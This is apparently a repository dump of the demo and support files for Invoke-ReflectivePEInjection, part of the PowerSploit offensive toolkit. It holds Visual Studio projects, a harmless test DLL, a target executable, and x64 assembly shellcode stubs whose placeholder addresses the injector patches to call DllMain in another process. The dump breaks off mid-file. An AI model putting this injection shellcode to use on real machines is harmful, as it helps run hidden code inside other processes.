131 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Windows
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 | false
152 | false
153 |
154 |
155 |
156 |
157 | false
158 | false
159 |
160 |
161 |
162 |
163 |
164 |
165 | Create
166 | Create
167 | Create
168 | Create
169 |
170 |
171 |
172 |
173 |
174 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL_RemoteProcess application.
9 |
10 |
11 | DemoDLL_RemoteProcess.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL_RemoteProcess.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL_RemoteProcess.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
6 | BOOL APIENTRY DllMain( HMODULE hModule,
7 | DWORD ul_reason_for_call,
8 | LPVOID lpReserved
9 | )
10 | {
11 | ofstream myfile;
12 |
13 | switch (ul_reason_for_call)
14 | {
15 | case DLL_PROCESS_ATTACH:
16 | _mkdir("c:\\ReflectiveLoaderTest");
17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt");
18 | myfile << "DllMain successfully called.\n";
19 | myfile.close();
20 | break;
21 | case DLL_THREAD_ATTACH:
22 | case DLL_THREAD_DETACH:
23 | case DLL_PROCESS_DETACH:
24 | break;
25 | }
26 | return TRUE;
27 | }
28 |
29 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32
18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64
19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64
20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32
21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64
23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64
24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32
26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64
27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64
28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32
29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32
30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64
31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}
23 | Win32Proj
24 | DemoExe_MD
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 | MultiThreadedDLL
89 |
90 |
91 | Console
92 | true
93 |
94 |
95 |
96 |
97 | Use
98 | Level3
99 | Disabled
100 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | true
102 | MultiThreadedDLL
103 |
104 |
105 | Console
106 | true
107 |
108 |
109 |
110 |
111 | Level3
112 | Use
113 | MaxSpeed
114 | true
115 | true
116 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
117 | true
118 |
119 |
120 | Console
121 | true
122 | true
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | Use
130 | MaxSpeed
131 | true
132 | true
133 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
134 | true
135 |
136 |
137 | Console
138 | true
139 | true
140 | true
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 | Create
154 | Create
155 | Create
156 | Create
157 |
158 |
159 |
160 |
161 |
162 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Exe loaded! Printing argc and argv\n\n");
12 |
13 | printf("Argc: %d\n", argc);
14 | printf("ArgvAddress: %d\n", argv);
15 |
16 | for (int i = 0; i < argc; i++)
17 | {
18 | wprintf(L"Argv: %s\n", argv[i]);
19 | }
20 |
21 | printf("Exiting exe\n");
22 |
23 | return 0;
24 | }
25 |
26 |
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}
23 | Win32Proj
24 | DemoExe_MDd
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 |
89 |
90 | Console
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 | true
101 |
102 |
103 | Console
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Console
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
131 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 | Create
152 | Create
153 | Create
154 | Create
155 |
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | printf("Press enter to close.\n");
12 | getchar();
13 |
14 | return 0;
15 | }
16 |
17 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}
15 | Win32Proj
16 | ExeToInjectInTo
17 |
18 |
19 |
20 | Application
21 | true
22 | v110
23 | Unicode
24 |
25 |
26 | Application
27 | false
28 | v110
29 | true
30 | Unicode
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | true
44 |
45 |
46 | false
47 |
48 |
49 |
50 | Use
51 | Level3
52 | Disabled
53 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
54 | true
55 |
56 |
57 | Console
58 | true
59 |
60 |
61 |
62 |
63 | Level3
64 | Use
65 | MaxSpeed
66 | true
67 | true
68 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
69 | true
70 |
71 |
72 | Console
73 | true
74 | true
75 | true
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 | Create
89 | Create
90 |
91 |
92 |
93 |
94 |
95 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/README.md:
--------------------------------------------------------------------------------
1 | The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
2 |
3 | https://github.com/mattifestation/PowerSploit
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/readme.txt:
--------------------------------------------------------------------------------
1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push rbx
7 | mov rbx, rsp
8 | and sp, 0xff00
9 |
10 | ; Call DllMain
11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell
12 | mov rdx, 0x1 ; PROCESS_ATTACH
13 | mov r8, 0x0 ; NULL
14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
15 | call rax
16 |
17 | ; Fix stack
18 | mov rsp, rbx
19 | pop rbx
20 | ret
21 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Set a var to 1, let PS known exe is exiting
